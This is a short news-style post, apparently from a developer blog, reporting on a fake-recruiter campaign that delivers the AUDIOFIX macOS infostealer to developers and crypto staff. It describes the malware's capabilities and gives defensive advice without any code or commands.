Cybersecurity researchers say they have uncovered this sort of sophisticated cyber campaign, aimed at cryptocurrency groups and also software developers, through fake recruiter vibes and custom macOS malware, yeah.
The threat actor-tracked as `JINX-0164 '- is reportedly running LinkedIn profiles that look like recruiters, reaching out to developers and to people employed at crypto-focused organizations. Then the victims get pulled into so-called virtual interviews or technical chats, hosted on teleconferencing websites that are deliberately made to seem legit.
So, during all this, the targets are coaxed into downloading what they’re told is a required meeting tool or even a “software fix”. But in reality, that download drops a Python-based macOS malware strain named AUDIOFIX. This thing works like an infostealer as well as a remote access trojan, which is a pretty bad combo.
Researchers note that AUDIOFIX can grab browser credentials, SSH keys, data from password managers, cryptocurrency wallet information, iCloud Keychain files, and even the currently active sessions from places like Slack, Discord, and Telegram. On top of that, it can let the attackers run shell commands from afar, fetch extra payloads, and then move sideways across internal development setups.
One of the more concerning elements is the way they lean into software supply chain compromise. Investigators claim they found signs the attackers tried to inject malicious code into internal code distribution systems, and into development environments too, after compromising employee devices first, or at least getting that foothold.
Also, the actor has been tied to a backdoor called MiniRAT, which was seen before inside a compromised npm package connected to a decentralized finance toolkit. The malware was built to execute commands, upload files, and download further payloads onto infected macOS machines, basically keeping control going.
Researchers have noticed some similar patterns between this campaign and methods that were earlier tied to North Korean cyber groups, specifically those going after cryptocurrency firms. Still, as of now, nobody has been able to confirm any direct infrastructure overlap.
This campaign really shows that social engineering isn’t just random anymore; it’s getting more pointed and professional, with extra focus on developers and staff who have access to financial systems, source code, and also cryptocurrency-related infrastructure.
Security experts suggest a few practical moves. like double-checking the recruiter identity, not downloading software from those unfamiliar meeting platforms, hardening developer environments, and keeping an eye on strange behavior across CI/CD pipelines and inside internal repositories
Organizations focused on cybersecurity, such as IntelligenceX, keep stressing how much developer security matters, how software supply chain protection should be treated seriously, and how proactive monitoring is becoming essential as cryptocurrency-focused cyberattacks keep maturing and turning more financially motivated
Top comments (0)